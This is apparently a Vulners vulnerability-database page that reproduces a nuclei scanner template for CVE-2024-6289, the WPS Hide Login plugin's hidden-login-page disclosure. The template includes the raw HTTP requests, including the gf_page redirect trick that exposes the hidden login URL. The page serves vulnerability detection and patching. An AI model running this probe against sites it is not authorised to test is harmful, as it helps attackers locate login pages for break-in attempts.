Lucene search
K

WPS Hide Login < 1.9.16.4 - Hidden Login Page Disclosure

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 186 Views

WPS Hide Login < 1.9.16.4 - Hidden Login Page Disclosure. Plugin allows unauthenticated access to hidden login page

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-6289
15 Jul 202409:19
circl
CVE
CVE-2024-6289
15 Jul 202406:00
cve
Cvelist
CVE-2024-6289 WPS Hide Login < 1.9.16.4 - Hidden Login Page Disclosure
15 Jul 202406:00
cvelist
EUVD
EUVD-2024-47407
3 Oct 202520:07
euvd
NVD
CVE-2024-6289
15 Jul 202406:15
nvd
OSV
CVE-2024-6289
15 Jul 202406:15
osv
Patchstack
WordPress WPS Hide Login Plugin < 1.9.16.4 is vulnerable to Bypass Vulnerability
15 Jul 202400:00
patchstack
Patchstack
WordPress WPS Hide Login plugin < 1.9.16.4 - Hidden Login Page Disclosure vulnerability
15 Jul 202407:55
patchstack
Positive Technologies
PT-2024-37516 · WordPress · Wps Hide Login
15 Jul 202400:00
ptsecurity
RedhatCVE
CVE-2024-6289
23 May 202508:49
redhatcve
Rows per page
id: CVE-2024-6289

info:
  name: WPS Hide Login < 1.9.16.4 - Hidden Login Page Disclosure
  author: s4e-io
  severity: medium
  description: |
    The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.
  impact: |
    Unauthenticated attackers can discover and access the hidden WordPress login page by exploiting improper redirect handling, defeating the security-by-obscurity measure.
  remediation: |
    Update WPS Hide Login plugin to version 1.9.16.4 or later to address the login page disclosure vulnerability.
  reference:
    - https://wpscan.com/vulnerability/fd6d0362-df1d-4416-b8b5-6e5d0ce84793/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6289
    - https://www.sprocketsecurity.com/resources/discovering-wp-admin-urls-in-wordpress-with-gravityforms/
  classification:
    epss-score: 0.00904
    epss-percentile: 0.55423
  metadata:
    verified: true
    max-request: 1
    vendor: wpserveur
    product: wps_hide_login
    framework: wordpress
    publicwww-query: "/wp-content/plugins/wps-hide-login/"
  tags: cve,cve2024,bypass,wp-plugin,wpscan,wordpress,wps-hide-login,vuln

flow: http(1) && http(2)

variables:
  string: "{{rand_text_alpha(10)}}"

http:
  - raw:
      - |
        GET /wp-content/plugins/wps-hide-login/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"WPS Hide Login")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        GET /?gf_page={{string}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - '!contains(tolower(location), "wp-login.php")'
          - 'contains(header,"%2F%3Fgf_page%3D{{string}}&reauth=1")'
        condition: and

    extractors:
      - type: kval
        kval:
          - location
# digest: 4a0a00473045022100eccd438f57af5fe4a671325dad27292ce0357b60eb304de55cd2de3b950c22e702202106eb4c38eb47575f7be38cc40a09644e1b881dec594c00b07aec8c911e75b1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.16.1
EPSS0.00904
SSVC
186